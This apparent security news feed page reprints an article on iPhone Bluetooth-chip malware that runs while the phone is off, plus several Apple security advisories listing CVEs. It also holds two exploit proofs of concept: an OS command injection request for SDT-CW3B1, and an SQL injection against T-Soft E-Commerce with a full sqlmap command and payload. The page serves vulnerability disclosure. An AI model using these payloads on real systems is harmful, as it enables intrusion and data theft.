Researchers found a way to exploit the tech that enables Apple’s Find My feature, which could allow attackers to track location when a device is powered down.

When you turn off an iPhone, it doesn’t fully power down. Chips inside the device continue to run in a low-power mode that makes it possible to locate lost or stolen devices using the Find My feature or use credit cards and car keys after the battery dies. Now researchers have devised a way to abuse this always-on mechanism to run malware that remains active even when an iPhone appears to be powered down.

It turns out that the iPhone’s Bluetooth chip—which is key to making features like Find My work—has no mechanism for digitally signing or even encrypting the firmware it runs. Academics at Germany’s Technical University of Darmstadt figured out how to exploit this lack of hardening to run malicious firmware that allows the attacker to track the phone’s location or run new features when the device is turned off.

This video provides a high overview of some of the ways an attack can work.

The research is the first—or at least among the first—to study the risk posed by chips running in low-power mode. Not to be confused with iOS’s low-power mode for conserving battery life, the low-power mode (LPM) in this research allows chips responsible for near-field communication, ultra wideband, and Bluetooth to run in a special mode that can remain on for 24 hours after a device is turned off.

“The current LPM implementation on Apple iPhones is opaque and adds new threats,” the researchers wrote in a paper published last week. “Since LPM support is based on the iPhone’s hardware, it cannot be removed with system updates. Thus, it has a long-lasting effect on the overall iOS security model. To the best of our knowledge, we are the first who looked into undocumented LPM features introduced in iOS 15 and uncover various issues.”

They added: “Design of LPM features seems to be mostly driven by functionality, without considering threats outside of the intended applications. Find My after power off turns shutdown iPhones into tracking devices by design, and the implementation within the Bluetooth firmware is not secured against manipulation.”

The findings have limited real-world value, since infections required first jailbreaking an iPhone, which in itself is a difficult task, particularly in an adversarial setting. Still, targeting the always-on feature in iOS could prove handy in post-exploit scenarios by malware such as Pegasus, the sophisticated smartphone exploit tool from Israel-based NSO Group, which governments worldwide routinely employ to spy on adversaries.

It may also be possible to infect the chips in the event hackers discover security flaws that are susceptible to over-the-air exploits similar to this one that worked against Android devices.

Besides allowing malware to run while the iPhone is turned off, exploits targeting LPM could also allow malware to operate with much more stealth since LPM allows firmware to conserve battery power. And, of course, firmware infections are extremely difficult to detect since it requires significant expertise and expensive equipment.

The researchers said Apple engineers reviewed their paper before it was published, but company representatives never provided any feedback on its contents. Apple representatives didn’t respond to an email seeking comment for this story.

Ultimately, Find My and other features enabled by LPM help provide added security, because they allow users to locate lost or stolen devices and lock or unlock car doors even when batteries are depleted. But the research exposes a double-edged sword that, until now, has gone largely unnoticed.

“Hardware and software attacks similar to the ones described have been proven practical in a real-world setting, so the topics covered in this paper are timely and practical,” said John Loucaides, senior vice president of strategy at firmware security firm Eclypsium. “This is typical for every device. Manufacturers are adding features all the time, and with every new feature comes a new attack surface.”

_This story originally appeared on_ _Ars Technica__._

Your iPhone Is Vulnerable to a Malware Attack Even When It’s Off

Apple Security Advisory 2022-05-16-8 - Xcode 13.4 addresses a logic issue and a privilege escalation issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-8 Xcode 13.4

Xcode 13.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213261.

Git  
Available for: macOS Monterey 12 or later  
Impact: On multi-user machines Git users might find themselves  
unexpectedly in a Git worktree  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-24765: 俞晨东

IDE  
Available for: macOS Monterey 12 or later  
Impact: An app may be able to gain elevated privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-26747: Mickey Jin (@patch1t)

Xcode 13.4 may be obtained from:  
https://developer.apple.com/xcode/downloads/ To check that the Xcode  
has been updated: * Select Xcode in the menu bar * Select About  
Xcode * The version after applying this update will be "Xcode 13.4".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC134ACgkQeC9qKD1p  
rhhvkA//TnfJPjjM0mtNqitNsvDFT6RrGrGwMkvIBy6GkkMIPYcdwGiGFOjwaZyj  
U53+wyHT6KMvgi78rsoeBIL3IqbZXh8XdXjVvwcUgvgDOzta+jk6FK04dxMQ4X74  
e41UtWuAvjnTGlmHbvMO/3fmKPQYFiGeyxS/U/q6Eh21JY1tBvcgF7Nwyw4jm+TS  
IDMJL8a8++1bRUts8wXlOj+Vh+mhCjDiLl0NXp61DQKF/dZQKYyMmVx/+eeXAjHw  
U2KrF2RZ+rfh/fyaacEJaqrz+HzAiFDE6c0swQugBr6yvL+usBHOw9FeVRjRRegQ  
9LwCKeRjbzZXTTaKiuwWzoYqJnyMtiUvnUPvhu2mSb/T06USxclSPE9IJt7+eEix  
/Qu32NUVeZC56tPc8zcbCXZuCRmBO/r0qudMt5ScjcqYlCn3ZUyslxwuZFutJXSw  
HN7UlSn7H5REEG+RPgjxCtvPiTRA4QSAqZDAVmSmDAR2uHSWhyx/WOxgd7ofckh5  
PUrHgFaKg/Xr9d1btemQ9h8H/h8UBxdM0yGv1v+Un2hDaoRNi0+uN12o1VI4W8m4  
yjoBkBcH1jr97t+WsMgacbOyPGcJQBLGP+smM8PoNFboDurt++3OiKaDvb42C+k7  
gwbf8apGlbGuiMq/BFhZWlrfJIKgJjq6ejDZtTFJ6PUb8EBQlHQ=  
=xRKW  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-8

SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.

    # Exploit Title: SDT-CW3B1 1.1.0 - OS command injection# Date: 2022-05-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: 1.0.0# Vendor home page : http://telesquare.co.kr/# Authentication Required: No# CVE : CVE-2021-46422# Tested on: Windows# HTTP RequestGET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1Host: IP_HEREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: */*Referer: http:// IP_HERE /admin/system_command.shtmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close

SDT-CW3B1 1.1.0 Command Injection

Apple Security Advisory 2022-05-16-7 - Safari 15.5 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-7 Safari 15.5

Safari 15.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213260.

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

Additional recognition

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Safari 15.5 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TcACgkQeC9qKD1p  
rhjYBQ/+LNLAA17vZ+b2uQnKRb9rCwHHZQoSm0rjxXyzcUiZaeloZQ6KTsIidEdr  
JxuqDYjtV8OfSqsgz03z/iK3Ka4AEqM8GNvrX5LhZVqzXnY8K8XHnsi9Z/EfY6nf  
XfRGhPAw/9juxWzLA3ywIu8D9eql1zWEixk82awqNv1v4+Xym4Ff9rEmtSMdJ+9R  
i32E8erdN2GHcR9Dvn2ej/MA/M8YKT6Zxx2Uax4VDJstJdNctabwW1rNwr0Km1ut  
gD9PEWLb3UeKOcBt/2qWHpohWANixft8+p0SJAfU4uEldepi7dN2wHrkuLdGLOEs  
r54mTTbT8G98wYqcOizwfKTwrCb64hfrcgtB32UoSRGzl8wRfkSOdsXTmizow5BK  
YDu18P44K6oxe7X2PtMUEI22/TdJsp8xtgpjqX24GUjcuDb7ZN6zJ7RJijtlsraO  
144GM1L9upX/A5LFBFlmXXTRJ1KTHz1PDw1+WXZTD5FWCPGh6uj0HtdXWOcaaNa5  
uqi7lhc0JxezyKv2QL6/PY8s/811kWfLr1MtNL7nVEMyJX4o3s8yFF1k58KyEzhy  
+VrzGoHQF1y8dhhDGPUrv5fSaCxZ5da2ZDpwBxNZMHLh5sDddvUspGLUTKmQY66R  
FanqabJeytFLB3yfdMJEQ+qDf8N6KIkw1V3HJw4YJQnF8sleWfM=  
=Vm71  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-7

Apple Security Advisory 2022-05-16-6 - tvOS 15.5 addresses bypass, code execution, integer overflow, out of bounds access, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-6 tvOS 15.5

tvOS 15.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213254.

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-22675: an anonymous researcher

AuthKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A local user may be able to enable iCloud Photos without  
authentication  
Description: An authentication issue was addressed with improved  
state management.  
CVE-2022-26724:  Jorge A. Caballero (@DataDrivenMD)

AVEVideoEncoder  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26736: an anonymous researcher  
CVE-2022-26737: an anonymous researcher  
CVE-2022-26738: an anonymous researcher  
CVE-2022-26739: an anonymous researcher  
CVE-2022-26740: an anonymous researcher

DriverKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend  
Micro Zero Day Initiative

IOKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A race condition was addressed with improved locking.  
CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab

IOMobileFrameBuffer  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

IOSurfaceAccelerator  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26771: an anonymous researcher

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: An attacker that has already achieved kernel code execution  
may be able to bypass kernel memory mitigations  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

Security  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

Wi-Fi  
Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple  
TV HD  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TcACgkQeC9qKD1p  
rhiw7BAAy82XZ2+vjnjFB1FrZ7ZnKtM4pz8MMpX4ZTD2ytgkwXi0qnyzBdMe/w4p  
zrpedL4p/RfdDOiM/4kWBtiH62qetiXDcE8tBqN8WTE9rf55cX4jlXrHASohFI2q  
ErkAjo51j2fg8S7a+luyaZWzBUZqlghtzWjtFgaHOQAP5dDf+He92kDerbrIDQw9  
dg0nL4os0VFgWdX0EtFC7umK8iiTFbvtoEbLDLFODWweaJN8LOP/LHe71YzAryKg  
Dh9ItWqVdzkCOKWR8F96NnoBs7c6B4naqQkS4k2F/m6C6ckPb8LI18ss7oiD3eMB  
k7oo7+u1zQFRKmk0XlfH7awxtEHjYjjw3LT8ko9QJ8mEuspxoiwW7n1mINWa7Khp  
YoCe88xR06kfti4h6MJDSN6JpxSnikEyJzR4j4xGL6rWjqCj+XV9ejrt9EgF8BL2  
JZ+Oceoh23m7IqVoMe1Hzjf1X3nsxXJQEg/xxRwHRknAjSNtVJUKhT4/ioOc9pu6  
TROAHYdSO5yRLNUNpj9RlkBeDbXtiWgA2IEg0wcUPzwf3Uzt2Qw9zBFbMb1hPSht  
7zTIOtF4Ub+MD6cFuHbC7hL58pRmA4FzEczLG81BoGGaFOCD2QDt0/ySTFr1M+YD  
g2L2PlZNgxd0zetkTkZbvAwroMUTRSi1GqxAhVeKwbvW4XAN+yc=  
=G3ho  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-6

Apple Security Advisory 2022-05-16-5 - watchOS 8.6 addresses bypass, code execution, integer overflow, out of bounds access, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-5 watchOS 8.6

watchOS 8.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213253.

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-22675: an anonymous researcher

DriverKit  
Available for: Apple Watch Series 3 and later  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: Apple Watch Series 3 and later  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend  
Micro Zero Day Initiative

IOMobileFrameBuffer  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

IOSurfaceAccelerator  
Available for: Apple Watch Series 3 and later  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26771: an anonymous researcher

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An attacker that has already achieved kernel code execution  
may be able to bypass kernel memory mitigations  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: Apple Watch Series 3 and later  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

libxml2  
Available for: Apple Watch Series 3 and later  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

Security  
Available for: Apple Watch Series 3 and later  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

TCC  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

Wi-Fi  
Available for: Apple Watch Series 3 and later  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TYACgkQeC9qKD1p  
rhhgaBAAq/igmuSba0Occu1TcS6aXG50gjUZyJXPu7/UVVWI4icwz+c/ruKquy/w  
XuiT+C2Q6CJIWn2qM+hHrHtgsi3EYI6XxrbgcLgmvGvbwICs9RwHyHc1ztSyurTe  
ys8gJkc+/nZWPKR4dy7JUl8NdjoTWuUyGVE9xOJQeISND5xUoDz2i9d8FKgkZta6  
FoJlIWCDuNq01vgcAfKSZqPX2mEPMnWL47Q6g69PXIs34iBcOrHNesZ/mH/jz5Nz  
aAnisEj9gC0+KERoMSmGoBrYmP7kr/DmVBEwa9cDA0rGfNntgNliQ7wbLxnT8kJG  
rJARAyLPtPsygs7UmnkDaNDkI/a63dIRWwPIKUOQYtKKqwNL5GSoytdk/OhRGjmN  
Hi7k1GmvGiJA7bFI3PIQDSi3YSC1cs9CeyIL2rNUSVmRZ7jHlXxlDQYH1/ad4DU1  
TqVw9Rwg0mlc0tYKUNjChg/uAK1G5OGidxtLRt0FzUaXvPoVLe0/btYeaH6ijfU9  
i1W+xJ8jGgWddP7r1HvNeN6B+WGuIEcla+GNduEV3+AcnxL9h6FP8sAzQuTHQtKC  
AkqUO1G20ieIQHKJPNEIpgLlrCFYVajDfRtB9zGDme6aBZNHxefOWMMxdKfnspj2  
MtFpJ9qPmpnRITjCF5z1RDfqFjXUZvePcRA6rS1Lq4ClgQ575yI=  
=zdvf  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-5

T-Soft E-Commerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# CVE: 2022-28132# Date: 18.02.2022######## Description ###############################################  Step-1: Login as Admin or with privilage user#  Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path#  Step-3: Capture the request save as .txt#  Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'#  Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'##  Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...# ########## Proof of Concept ########################################========>>> REQUEST <<<=========GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Sec-Ch-Ua-Platform: "Linux"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://domain.com/srv/admin/products/products-v2/indexAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9=============> RESULTS OF THE SQLMAP <==========================Parameter: SatisAlt (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20---back-end DBMS: MySQL 5available databases [2]:[*] d25082_db[*] information_schema[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable

T-Soft E-Commerce 4 SQL Injection

Apple Security Advisory 2022-05-16-4 - Security Update 2022-004 Catalina addresses bypass, code execution, denial of service, integer overflow, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-4 Security Update 2022-004 Catalina

Security Update 2022-004 Catalina addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213255.

apache  
Available for: macOS Catalina  
Impact: Multiple issues in apache  
Description: Multiple issues were addressed by updating apache to  
version 2.4.53.  
CVE-2021-44224  
CVE-2021-44790  
CVE-2022-22719  
CVE-2022-22720  
CVE-2022-22721

AppKit  
Available for: macOS Catalina  
Impact: A malicious application may be able to gain root privileges  
Description: A logic issue was addressed with improved validation.  
CVE-2022-22665: Lockheed Martin Red Team

AppleGraphicsControl  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
